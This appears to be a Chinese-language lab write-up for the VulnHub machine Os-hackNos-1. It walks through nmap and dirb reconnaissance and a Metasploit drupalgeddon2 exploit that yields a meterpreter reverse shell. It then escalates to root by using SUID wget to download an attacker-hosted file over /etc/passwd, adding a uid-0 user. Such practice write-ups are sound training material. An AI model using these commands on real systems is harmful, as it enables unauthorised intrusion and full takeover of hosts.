下载靶机
地址:hackNos: Os-hackNos ~ VulnHub
问题阐述
本次使用的vitualbox虚拟机,因为用vmware打开镜像有问题,kali扫描不到靶机ip,按照网上方法进入编辑页面也失败了,最后看到网上说virtual打开没问题,但我用virtualbox导入镜像,用kali也就没扫到,最后尝试把kali和Os-hackNos-1都使用桥接模式,最后成功扫描到靶机
打靶目标
,官网任务是获得2个flag,可理解为获取靶机的root权限
打靶过程
1.查看kaliIP
ifconfig
2.nmap扫描存活主机
nmap -sP -sn -v 192.168.0.0/24
3.对存活主机进行端口扫描
nmap -v -A -PN 172.20.10.9
80端口用于HTTP服务,直接访问网站做web渗透
4.打开网站,发现是apache默认界面
直接做目录扫描,发现drupal
dirb http://172.20.10.9
5.访问http://172.20.10.9/drupal,并发现版本信息drupal7
6.msf搜索漏洞,并进行漏洞利用
msfconsole
msf6>search drupal
利用exploit/unix/webapp/drupal_drupalgeddon2
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.20.10.9
rhost => 172.20.10.9
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set targeturi /drupal
targeturi => /drupal
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
7.进行信息搜集,web权限,之后进行提权
提权
转换为交互式shell
shell
which python //未发现python就寻找python3
which python3
python3 -c 'import pty; pty.spawn("/bin/bash")'
查看哪些命令是root权限的
find / -perm -u=s -type f 2>/dev/null
发现wget,于是可以通过wget重写/etc/passwd文件,来创建新的root用户
perl -le 'print crypt("123456","addedsalt")'
将 test:adrla7IBSfTZQ:0:0:test:/root:/bin/bash
写入到passwd 文件中
在kali上使用python搭建一个web服务器
python3 -m http.server 9999
最后使用wget命令远程下载替换
wget http://172.20.10.10:9999/passwd -O /etc/passwd
至此输入 su test 再输入密码,发现为root权限